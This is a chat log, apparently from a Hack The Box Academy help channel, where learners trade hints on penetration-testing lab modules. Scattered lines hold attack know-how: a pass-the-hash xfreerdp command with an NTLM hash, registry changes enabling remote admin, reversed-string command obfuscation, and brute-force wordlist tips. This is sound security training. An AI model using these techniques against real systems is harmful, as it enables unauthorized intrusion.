read and follow the instructions in #welcome to gain access

hihi i was wondering how you resolved this :X thank you... or if anybody would know, for citrix breakout, how does one switch from the citrix environment back to the local desktop?

then take notes on the little things 😉

Maybe the default method you are using is filtered so you should try another method in the HTTP request.

1; don't spoil assessments
2; read the evasion section again, there's something important in there relating to connecting 😉

sorry, and thanks for the answer🙂

@fathom pendant Lol, will do!

biggest thing to unstick yourself in the future is taking notes on stuff that get you stuck in the moment and how you resolve it

Yes, great idea! I need to write some notes down tomorrow because I actually reinstalled my parrotOS and found a video on YouTube that showed how to dismount and when to dismount the iso. So I got it working good now.

I just have to get into the habit of doing it right away ALL the time.

I have a question on the Windows Security section from Windows Fundamentals, particularly the "What 3rd party security application is disabled at startup for the current user?" question. ||I can't figure out where exactly NordVPN gets disabled, seeing as it is in the current user's Run key and therefore should be running. Is there something in Windows that can override what's set in the Run key?||

the user could very well have just went in and disabled it themselves at startup

¯_(ツ)_/¯

as you can see one-drive is also disabled AND in the runkey

Right, I guess I was just expecting it to be disabled by default somewhere

Yeah, that's true

Alright, thank you

Hello everybody ! In section https://academy.hackthebox.com/module/158/section/1427, I would like to practice the technique presented as advised in the conclusion. The problem is that we are supposed to have RDP access to the target, but no credentials are given. How to get around this problem ?

you don't need to practice rdp or anything; plenty of the other sections deal with tat

this section is part of laying the groundwork for understanding the tools

Ok, thanks

I need some help ... Kerberos-Constrained Delegation from Linux. Nothing in this section works on anything -PwnBox, Parrot, nor Kali... reset machines about five times now. This is really a downer.

I get the ST with getST.py just fine and it saves. Export to KRB5CCNAME. Then psexec does not work on anything.

is there an update to the Linux Fundamental Module?

I mean how can I know which section in the Module have been updated ? Because every section in the Module has a green checkmark like I have been completed.

#academy-announcements message

Progress won’t be reset

Hi everyone! I have started the Penetration Tester job role path and now I am having some hard time with the section "Pass the Hash" of Password Attacks module. More specifically in the question "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?", even though I can successfully PtH the administrator's account through impacket, I cannot RDP to the same host using PtH and I am getting an (wrong username or password). I have modified the DisableRestricteAdmin registry key value under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa as well as the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1, to allow local accounts perform remote administration. The xfreerdp command I am issuing is: xfreerdp /v:10.129.2.65 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /cert-ignore /timeout:6000
[06:31:18:280] [68675:68676] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[06:31:18:282] [68675:68675] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

A hint or some help will be more that welcomed. Thank you in advance.

└─$ xfreerdp /v:10.129.2.65 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /cert-ignore /timeout:6000 +sec-nla
[06:39:53:938] [72901:72902] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[06:39:53:940] [72901:72901] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

Module: AD Enum & Attacks
For past few days xfreerdp doesnt seem to work , but rdesktop works (VPN: US)
Command used : xfreerdp /v:10.129.243.216 /u:htb-student /p:"Academy_student_AD!" /d:inlanefreight.local /cert:ignore +clipboard /dynamic-resolution

just press enter

ohh got confused because some youtuber mentioned that even though he completed the Bug Bounty Hunter Path, his path towards completion becomes 98 % percent or something because there's been a update on some Modules. So I though maybe the new updated section in the module becames to non completion.

lol

@lusty thicket I'm for real I know basics but I need to know more about languages and how to read binary and write binary and I need to find out how to use Python and Linux cuz right now it's confusing me

anyone able to point me in the right direction for 2nd question in** NTLM relay** skills assessment? - BACKUP01 =>|| i was able to create a machine account and coerce to get BACKUP01$ ntlmv2 hash and relay it too for q3|| , update: done , only last flag now :))

Do the information security foundation Path first

@jolly yacht thank u what's that and where do I find it

Looking it up now thank u so much

Hi all. I'm just working on https://academy.hackthebox.com/module/116/section/1466 - Module: [Attacking Common Services - Easy]

Aside from the fact that the intro offers some insight into the server having SMTP - are we also supposed to be able to tell from our NMAP scans? Because, no matter how I've scanned, SMTP doesn't seem to be showing up. 🤷‍♂️

`sudo nmap -Pn -p- 10.129.203.7
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 15:57 GMT
Nmap scan report for inlanefreight.htb (10.129.203.7)
Host is up (0.031s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
443/tcp open https
3306/tcp open mysql
3389/tcp open ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 156.38 seconds`

From a troubleshooting perspective have you tried scanning just SMTP to see if you get results? Have you performed any other nmap scans?

Yes, I ran script scans etc., but the issue seems to have been the machine I was given. I terminated the target and spawned another machine (about four times) - last time SMTP shows up and I'm also able to brute-force the service. 😆 Thanks for taking the time to reply!

Yeah no worries. Check a few things and if you are doing things right, it's worth resetting the target.

Hello! Sorry if this is not the right place but where should I ask for help with a retired machine? Thanks!

#boxes - read and follow #welcome to get access

I can't connect from my vm , i have activated my tun0 openvpn

I tried different requests ||PATCH, PUT, OPTIONS, GET, DELETE, and HEAD state: Missing Parameters POST states: Access Denied||

hey in Windows Attacks & Defense am I the only that cant connect to PKI at 172.16.18.15 via RDP?

It's not up at all

Information Gathering - Web Edition -Skill Assessment question no. 3:
"After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I am not getting any results when doing crawling neither inlanefreight.htb not the subdomain I have found. Used reconspider and finalrecon on both targets and did not get any email. Any hints very apprecuated!

Enumerate everything. Apply all the techniques in the module to everything you have found.

Hello I am doing a module but I cannot seem to get the flag

Command Injections: Advanced Command Obfuscation
Just to be clear we need to run the command: find /usr/share/ | grep root | grep mysql | tail -n 1
RIght?

Well I did. So I ended up here. Any hints?

That's what the challenge question says, yes

Take a step back and really use every technique. If you find something, start from the beginning and apply every technique to it again. This is how you find what you are looking for

well, i doubt the first two commands would execute correctly due to the parenthesis being missing, i'm going to delete that message though because it kind of reveals a lot

So there is a typo or some? What about the third one if you were able to see it

you have an opening parenthesis but not closing

Any advice? I tried ||HTTP verb tampering but everything other than POST says Missing Parameter||

$(rev<<<'reversed command')
I checked and this was the format of the command I sent here

well i'd keep trying then, but that's not what you posted when you posted the command

Ohhh mb it was typo I was supposed to send the rev one there

just remember the command is going to run on the system as you input it, so if you're reversing the command it's like you typing the command in reverse in the terminal, ie. it won't work. so if you reverse it make sure you reverse the code too

It doesn't reverse symbols like \ doesn't become /

So { would not be }
It still would be {

Got it thank you!

yeah i know

This is just to add on, meant to untag you lol

Ig using reverse string was a bad idea lol

Might be missing one part. You can DM your request.

Think of it like reading the string order backwards

Got the flag haha

yeah like if you type 'ls' into the console, reverse it'd be 'sl'

Like going backwards through an array

Ok, got it. Started all over and finished it now. Thanks

If you change it to ||GET|| you also need to change the parameters to match that format

Does anybody know how can I connect to an instance in the challenges, because when I try to using netcat or ssh it says couldnt resolve host

#challenges read and follow #welcome

whats up with this ldap part: What non-default privilege does the htb-student user have?

there are no privileges that ur non-default

that's not true

that doesn't show all the privs

what does?

I don't know any other commands?

this is one of those things where context matters

UAC?

or what

whoami /groups

user might inherit non-default privileges through group membership

also might be smart to do "whoami /priv" from an elevated shell

never done this module myself

nah it was bug in the machine, had to restart it, it didn't gave me elevated shell

Hi all, I'm working on the 'Attacking GitLab' for some hours now. I cannot get the 1st question right "Find another valid user on the target GitLab instance.". I've run the python script with the usernames list under /usr/share/seclists/Usernames/Names (the longest one) and found exactly the same users in the lesson. The field doesn't accept the answer. Puzzled now, can I get any help on this?

try using hydra instead

medusa is a bit finicky and touchy

also don't reveal info for modules above tier 0

i was thinking that ngl i liked hydra cause it was easier(sorry btw about leaking info i tried to hide it but yeah can spoil it for yourself)

just a small question inside the module i am loging in from inside the thing using ssh, which has medusa installed and its specific password thing, but no curl or sudo.... weird ik, so i cant get hydra on the server so do i do it from a seperate box or somthing

oh

which section are you specifically doing

medusa- webservices

in login brute forcing

the username is case sensitive

you're overthinking things

I'm running the other wordlist now, and I already see uppercase ones.. weird

sorry but wdym

password reuse; consider that

consider the subsection <retrieving the flag> in the reading

the question states bruteforcing ssh, then LOGGING IN to the ftp service, NOT brute forcing ftp

yep so when ur in the ssh, but the password that got me into ssh isnt geting me into ftp

playing with the case it's not working... any other tip?

cause your inside ssh still cause your loging in while still inside there server so you can act as the local host cause your in the server

did you answer q1?

:)

(you don't have to bruteforce ftp to get q1 btw)

(ftpuser exists as a user in /home/ ... draw conclusions from there)

nope i havent gotten there lol, i am in using ssh and i looked around a bit cause i have access to cd so i went to the home directory, but i havent gotten into ftp user

https://github.com/danielmiessler/SecLists/blob/master/Usernames/cirt-default-usernames.txt

thanks will try out

listen to me when i tell you: you can get to ftpuser from the outside

so should i brute force using hydra from the outside........ cause the password given earlier in the module doesnt get me in

the first account you crack is for sshuser

not ftpuser

utilize some braincells to connect dots

yep i am in sshuser

i ran out of those sorry, i will try to do more digging before i ask more ig

this is from inside as well using the syntax the module provided from sshuser

btw you may be misinterpreting the medusa output; only the line with [SUCCESS] is the valid pw

so it can absolutely be done from within the ssh session with sshuser

yeah i dont know why i got that other thing the other time, i got the real one now thanks

the 1... entry is for bruteforcing the sshuser... which is their password

make sure you put the right username

you got ftpuser? :)

any luck?

i find it a minor oversight that they allow you to bruteforce the ftpuser and bypass even looking for sshuser :: eta dropped a post in #1234357888114364508 to maybe see if this is intentional or unavoidable

yeah sorry idk why i got the other password earlier but now i got the flag

Yep, now I'll spray gitlab.. once it's done I'll proceed with the RCE. Thanks!

Hey guys, i'm stuck since a few days on the Windows Event Logs & Finding Evil skilss assessment, on the first question on the DLLhijacked, i did a lot of things but cant find nothing, first thing that i dont understand is why is there no ID EVENT 7 in the logs?

sorry i am back but just a quick question after looking through login brute forcing-custom wordlist, am i suppsed to follow the example to get in, and if so how to i obtain usernames.txt(thats why i am wondering this is a example), or do i just brute force like earlier and use hydra and break in

use the example data/info to create the wordlists

Yo guys can someone help me with this one:

From the Pivoting module
The Web Server Pivoting with Rpivot section
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.

Using firefox with proxychains the page does not load so I tried using curl, but the flag I see does not get accepted. Could someone check if I have the correct flag or if I am doing something wrong? The flag contains I_L0v3....... I have no spaces in front or after it

try refreshing the page

I tried but the firefox browser does not seem to want to connect

echo 'flag_value' | md5sum
e78870563404e7fbae006e02cf1b1eda

i meant the academy page where you're submitting the answer LOL

Oooh well that also did not work and I have a different hash value

then you didn't copy it fully or you missed something

dm me the flag you retrieved

@bright ridge am I on the right path using /usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt to brute force? it's taking a while :/

rockyou shouldn't generally be used to bruteforce

I'v tried others like the ones in /usr/share/seclists/Passwords/Common-Credentials/

the weak passwords mentioned on the section are found on the rockyou-70.txt, that's why I used

if rockyou is meant then it'd be near the top of the file

hmm

the examples won't always match what you expect

vaz gave you a wordlist to try from seclists btw

that one worked to find the user

which should work

but know I need to break the pwd

wait that's for user

hmm ok

i know it was a basic list i don't recall which list though

for password

kk, will keep looking thanks

read the last section again that last sentence seems like it could be interesting to try

However, if we encounter...

seems like you missed something to try instead of bruteforcing passwords

yeah just ran the section; bruteforcing is a rabbit hole, reading the section again may provide more clarity

ok, I'm exploring the project but don't see any clue, might need to run nmap to find out something else

nope

you're missing the important bit at the end of the last paragraph

something about being able to create your own account 😉

and depending on the version, you may be able to do some funny stuff 😉

yeah, I created an account on the 1st minute.. will explore the other project I see it available

ohhhhhhhhhhhhhhhhhhhhhhhh

I was so biased about the question 1 user account that I missed the basics

got the RCE working now!

I thinked too much and missed the obvious thing

https://tenor.com/view/meonly-gif-19710542

the lady in the gif is a well-known artist in my country (Brazil) btw

I'm about to start the Pivoting module, and I've been using Ligolo for some time now. I also know the module doesn't cover Ligolo but instead uses a combination of other tools.

My question is: would I miss anything if I didn't practice those tools and continued using Ligolo throughout the module? For example, is there a feature Ligolo lacks that might be critical in some edge cases?

Renata Sorrah

I actually heard that for CPTS it's best to use Ligolo to save some trouble

always best to know another method when your preferred one doesn't work

and that other method will usually involve proxychains

Any idea why my zap proxy doesnt show hud when its turned on

Like when I request it doesnt give me the alert box to step and continue

Any idea?

idk

💀

💀

💀

I can't complete Web Requests>GET it says:

The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag

I'm using curl 'http://<IP><PORT>/search.php?search=flag' but nothing

not broken i just did it yesterday. it tells you to use devtools and you're using curl.. try using devtools in the browser to inspect the responses.

yep browser devtools is the first step

ugh nevermind i was thinknig about a different section

even still i think this one is a bit interesting i'd have to pull it up to be sure though

you're missing the crucial bit > authentication

actually yeah i got it just now

same

used shitty wincurl

but i got it

:)

lmao i used windows too

wincurl, it's a pain if you're gonna do json requests

If you visit the website first you'll see that you have to log in with the provided credentials.. when you do that you get a header you need to include in your curl command

it's even above the question to authenticate, there's even syntax given in the section how to :)

First I did it with devbrowser, later with curl but I didn't get an answer bc I got a "failed to connect"

and even a syntax for an auth bearer token

failed to connect
did it tell you anything about why it failed to connect?

curl: (7) Failed to connect to x port x after 271 ms: Could not connect to server

ah

resetting the target tends to fix those issues

I did it 2 times... devbrow should give me a header auth?

"Authorization: B64stringhere="

when you view the request

Can I send you ss? Again failed to connect

is that ip and port up?

i'm assuming you're not literally typing IP:PORT into curl

Yes, I'm using an active target

Done

I was using my VM without the OpenVPN

Sorry for bothering

Hi. I'm working on the File Upload Attacks module, in the Skills Assessment section. Is there any person/user that I can DM to discuss here?

Don't need the vpn for that target

It's a public ip:port, hence why I did it on winders

I was using it with my VM, bu i used the pwned & works

the same comand\

Hi, I am stuck in Windows Lateral Movement => Windows Remote Management (WinRM) => Question 3 (getting to DC01), could anyone give me some help? DM me please

Hello Guys Someone available to ask about ADCS skill assessment ?

If you are still there, can you send me dm

Hey who can help me reset my Android phone i forgot my Password

Sure you did

I hear putting it on rice helps

Hey if you could help me that'll be awesome

I'm new into these

sure, I'll DM u while I'm crafting my question. Thanks a lot

#rules and no no one here will help you with a shady request

What do you mean by shady question I forgot my own android phone password

No one here is gonna believe it's your phone. If you forgot it, factory reset or take it to a shop

Like how do you forget your own phone password

Besides it's off topic of this chat

I used to use it a long time ago now I found it in my back pack from highschool lol

I suggest reading #welcome

Am not gonna pay for my phone to get unlocked lol

Cool story, don't care, take it to a shop

we can't help you @swift anchor

Yea alright guys thanks